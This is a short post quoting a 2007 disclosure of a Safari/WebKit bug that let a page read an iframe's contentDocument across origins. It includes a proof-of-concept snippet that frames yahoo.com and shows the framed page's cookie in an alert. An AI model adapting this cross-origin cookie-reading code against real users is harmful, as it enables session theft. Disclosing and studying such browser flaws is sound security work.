XSS on Safari

http://xssinsafari.blogspot.com/2007/08/bug-in-safari-allows-xss-attacks-on.html wrote:
Bug in Safari allows XSS attacks on websites. Safari/Webkit allows the "contentDocument" attribute of iframes to be read from the containing page. This can be used to get the cookie of the "iframe". The exploit does not work in other browsers.

<iframe id="subfr" height="300" width="300" src="http://www.yahoo.com"></iframe>
<script>
// Wait two seconds so the framed page has time to load.
setTimeout('later();', 2000);
function later() {
  var subFrame = document.getElementById("subfr");
  // Cross-origin read of the framed document; other browsers block this.
  window.alert("your yahoo cookie is " + subFrame.contentDocument.cookie);
}
</script>